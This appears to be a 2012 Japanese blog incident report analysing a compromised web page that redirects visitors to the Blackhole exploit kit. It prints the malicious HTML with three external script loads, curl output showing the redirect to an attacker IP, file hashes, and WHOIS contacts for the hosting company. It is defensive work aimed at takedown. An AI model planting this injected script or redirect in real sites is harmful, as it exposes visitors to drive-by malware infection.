本件の感染事件に付いて、前回の#OCJP-031事件状況と同じ情報です。感染されたURLとリダイレクターURLが別のURLになりました。詳細調査情報については#OCJP-031の調査レポートをご覧下さい。URL↓
http://unixfreaxjp.blogspot.jp/2012/03/ocjp-031.html
さて、本感染事件の情報は下記となります↓
----■下記のドメイン/サーバ↓
kazahana.hanabie.com / 112.140.42.29■下記のURL↓
hxxp://kazahana.hanabie.com/FP817PwV/index.html■ダウンロード証拠↓
--20:02:05-- hxxp://kazahana.hanabie.com/FP817PwV/index.html => `index.html' Resolving kazahana.hanabie.com... 112.140.42.29 Connecting to kazahana.hanabie.com|112.140.42.29|:80... connected. HTTP request sent, awaiting response... 200 OK Cookie coming from kazahana.hanabie.com attempted to set domain to shinobi.jp Length: 316 [text/html] 100%[====================================>] 316 --.--K/s 20:02:05 (7.19 MB/s) - `index.html' saved [316/316]■下記のマルウェアが発見されました↓
アファイル :「index.html」 マルウェア種類: Blackhole JavaScript Trojan REDIRECTOR マルウェア名 : JS.Trojan.Downloader.HackLoad Trojan.JS.Agent など マルウェア機能: マルウェアサイトのJavascriptをダウンロードと実行されます、 説明 : 本件のサンプルではBLACKHOLE EXPLOIT PACKから感染されたURLです。 クリックしてしまうとマルウェアサイトへ飛ばされて、 マルウェアがダウンロードされます■感染されたファイルの情報↓
File name: index.html MD5: 805ca9a50043fdd34b7dbc983d460fac File size: 316 バイト ( 316 bytes ) File type: HTML Analysis date: 2012-03-31 11:57:36 UTC Detection ratio: 14 / 42 Result: 【CLICK】■マルウェアの仕組み↓
本マルウェアの動きはOCJP-031と同じ仕組みです↓ ・本事件の感染されたHTMLファイルをアクセスしたら外のjsファイルの<SCRIPT>を実行されて ・shellcodeのダウンローダーURLへ飛ばされて ・shellcodeを実行されて、ZeuSダウンローダーを実行されます。 ・などなど(OCJP-031へ御確認下さい) 中身を見たら↓ $cat index.html■感染されたサーバ/ドメインに付いて<html> <h1>WAIT PLEASE</h1> <h3>Loading...</h3> <script type="text/javascript" src="hxxp://pavelknotek.cz/aRLw3hH2/js.js"></script> <script type="text/javascript" src="hxxp://webizleme.com/e2htJnFF/js.js"></script> <script type="text/javascript" src="hxxp://renewcarvings.com/EXHRnDGP/js.js"></script> <html>上記のURLに確認したら、2件が生きている、1個は死んでいる↓
$ curl webizleme.com/e2htJnFF/js.js document.location='hxxp://178.32.160.255:8080/showthread.php?t=73a07bcb51f4be71'; $ curl renewcarvings.com/EXHRnDGP/js.js document.location='hxxp://178.32.160.255:8080/showthread.php?t=73a07bcb51f4be71';上記のjs.jsのスキャン結果は↓
そして「showthread.php?t=73a07bcb51f4be71」のサンプルは下記となります↓
File size: 17.8 KB ( 18209 bytes ) File name: showthread.php@t=73a07bcb51f4be71 File type: HTML MD5: 4b64de3396cf83603f227d7bcce84cc4 Detection ratio: 1 / 42 Analysis date: 2012-03-31 11:30:40 UTC Result: 【CLICK】↑OCJP-031と同じサンプルです、動きはまったく同じですので、OCJP-031をご覧下さい。
ドメイン登録(図) 登録内容(報告/手続きの連絡先)↓ インターネットのルーティング情報(図) ドメイン/IP登録情報(連絡/報告手続きの為) Domain Name: HANABIE.COM Registrar: GMO INTERNET, INC. DBA ONAMAE.COM Whois Server: whois.discount-domain.com Referral URL: http://www.onamae.com Admin Name: kenichi kashiwagi Admin Organization: Samurai Factory Inc. Admin Street1: 16-28 Nanpeidai-cho Admin City: Shibuya-ku Admin State: Tokyo Admin Postal Code: 150-0036 Admin Country: JP Admin Phone: 0362775281 Admin Email: domainregist@ml.ninja.co.jp inetnum: 112.140.42.0 - 112.140.42.255 netname: SF-SERVICE01 descr: Samurai Factory Inc. country: JP admin-c: JR594JP tech-c: JR594JP a. [JPNICハンドル] JR594JP b. [氏名] 竜石堂 潤一 c. [Last, First] Ryusekido, Junichi d. [電子メイル] domainregist@ml.ninja.co.jp f. [組織名] 株式会社サムライファクトリー g. [Organization] Samurai Factory Inc.
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック
Tweet
TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
マルウェアファイルが削除してくれまして、有難う御座いました。本件の対応は終了です。下記は証拠です。
返信削除--13:57:45-- http://kazahana.hanabie.com/FP817PwV/index.html
=> `index.html'
Resolving kazahana.hanabie.com... 112.140.42.29
Connecting to kazahana.hanabie.com|112.140.42.29|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
ご協力頂き有難う御座いました。 m(_ _)m